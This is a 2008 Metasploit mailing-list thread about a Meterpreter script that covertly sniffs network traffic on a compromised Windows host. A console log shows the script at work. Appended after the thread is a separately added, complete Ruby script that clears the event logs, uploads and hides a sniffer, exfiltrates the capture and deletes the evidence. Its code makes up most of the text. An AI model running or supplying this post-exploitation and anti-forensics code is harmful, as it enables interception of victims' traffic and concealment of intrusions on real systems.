Metasploit mailing list archives

Meterpreter tcpdump script


From: basehat at gmail.com (base64)
Date: Thu, 13 Nov 2008 19:41:02 -0800

I would love to see this implemented as a meterpreter extension, and
have been meaning for some time to release something similar written as an
extension.

If you could provide the Packet Sniffer SDK this would greatly help, and
thanks again for your code!

Best Regards,
Adrian Castro

basesixtyfour.com

On Thu, Nov 13, 2008 at 6:45 PM, Jun Koi <junkoi2004 at gmail.com> wrote:

2008/11/13 Matteo Cantoni <matteo.cantoni at gmail.com>:
Hi,

ok ok I know this is a simple meterpreter script, but it seems to work and I
wrote it drinking some beers in a pub :)

1) clears all the event logs (if log_clear is 1)
2) upload tcpdump.exe (compiled with Packet Sniffer SDK, WinPCap is not
required) on target with random name
3) create a dump file with random name
4) kill sniffer's process on target
5) download dump file from target
6) remove sniffer and dump from target
7) clears all the event logs (if log_clear is 1)

meterpreter > run tcpdump
[*] Clearing the all events logs!
[*] Uploading executable OROPJ.exe to target!
[*] Sniffing for 600 seconds! (interface 2, dump file ZZTCN.pcap)
[*] Killing off OROPJ.exe after 600 seconds (pid 744)
[*] Downloading dump file ZZTCN.pcap...
[*] Removing OROPJ.exe and ZZTCN.pcap!
[*] Clearing the all events logs!
[*] Done!
meterpreter >

You could also add some tcpdump filters, etc.

- http://www.nothink.org/metasploit/tcpdump.rb
- http://www.softpedia.com/get/Network-Tools/Network-Tools-Suites/PacketStuff-Network-Toolkit.shtml

This is interesting, but still I find that weird: The whole point of
meterpreter is to do everything in the memory and avoid writing
anything to the disk.

Meanwhile, your method does everything to destroy what meterpreter
tries to do by dumping a lot of things to the disk! Is that a good
idea, after all?

Do I understand your idea correctly?

j
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework




-- 

Best Regards,
Adrian Castro
Senior Software Engineer
(310)765-0627
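The seven steps Matteo lists above, written out as a Meterpreter script. This is an added example and not his tcpdump.rb from nothink.org: it uses the stdapi Ruby API a Meterpreter script of that era has access to (client.fs.file, client.sys.process, client.sys.eventlog), with `client` being the session object the script runner injects. The local path of the WinPcap-free tcpdump.exe, the option names, the interface index, the duration and the local output directory are all assumptions. Jun's objection applies as written: the script puts two files on the target's disk (the sniffer and its dump) and runs a process there, which is the price of getting a capture this way.

```ruby
# Added example (not Matteo's tcpdump.rb): a Meterpreter script, Metasploit 3.x
# era stdapi API, that performs the seven steps from the post. `client` is the
# session object injected by the script runner; the sniffer path, interface
# index, duration and local output directory are assumptions passed as options.
#
# Caveat from the thread: this writes two files to the target's disk (the
# sniffer and its dump) and runs a process, so it gives up Meterpreter's
# in-memory footprint in exchange for the capture.

# Random upper-case name, as in the post's OROPJ.exe / ZZTCN.pcap. Plain Ruby
# is used instead of Rex::Text.rand_text_alpha so the logic runs outside msf.
def rand_name(len = 5)
  Array.new(len) { ('A'..'Z').to_a.sample }.join
end

# print_status exists inside a Meterpreter script; fall back to puts elsewhere.
def status(msg)
  respond_to?(:print_status, true) ? print_status(msg) : puts("[*] #{msg}")
end

# Steps 1 and 7: clear the standard Windows event logs through the eventlog
# extension. A log that cannot be cleared is reported, not fatal.
def clear_event_logs(client, logs = %w[application system security])
  status('Clearing all event logs!')
  logs.each do |name|
    begin
      client.sys.eventlog.open(name).clear
    rescue ::Exception => e
      status("Could not clear #{name}: #{e.message}")
    end
  end
end

# Steps 2 to 6. Returns the names it used so a caller (or a test) can check them.
def run_sniffer(client, opts = {})
  local_exe = opts.fetch(:local_exe)          # assumed path to the WinPcap-free tcpdump.exe
  duration  = opts.fetch(:duration, 600)      # seconds to sniff
  iface     = opts.fetch(:interface, 2)       # tcpdump -i index on the target
  log_clear = opts.fetch(:log_clear, true)
  local_dir = opts.fetch(:local_dir, '/tmp')

  tmp       = client.fs.file.expand_path('%TEMP%')
  exe_name  = "#{rand_name}.exe"
  pcap_name = "#{rand_name}.pcap"
  exe       = "#{tmp}\\#{exe_name}"
  pcap      = "#{tmp}\\#{pcap_name}"

  clear_event_logs(client) if log_clear

  status("Uploading executable #{exe_name} to target!")
  client.fs.file.upload_file(exe, local_exe)

  status("Sniffing for #{duration} seconds! (interface #{iface}, dump file #{pcap_name})")
  sniffer = client.sys.process.execute(exe, "-i #{iface} -w #{pcap}", 'Hidden' => true)
  sleep(duration)

  status("Killing off #{exe_name} after #{duration} seconds (pid #{sniffer.pid})")
  client.sys.process.kill(sniffer.pid)

  # Keep only the random file name locally; File.basename would not split a
  # Windows path on a Unix-hosted console.
  local_pcap = File.join(local_dir, pcap_name)
  status("Downloading dump file #{pcap_name}...")
  client.fs.file.download_file(local_pcap, pcap)

  status("Removing #{exe_name} and #{pcap_name}!")
  [exe, pcap].each { |f| client.fs.file.rm(f) }

  clear_event_logs(client) if log_clear
  status('Done!')

  { pid: sniffer.pid, remote_exe: exe, remote_pcap: pcap, local_pcap: local_pcap }
end

# Entry point when loaded with `run <scriptname>` inside a session.
if defined?(client) && client
  run_sniffer(client, local_exe: '/opt/tools/tcpdump.exe', duration: 600, interface: 2)
end
```

The session object is passed in rather than read from the script scope so the same logic can be exercised against a stub outside the framework; inside a session the trailing guard runs it exactly like the transcript in the post.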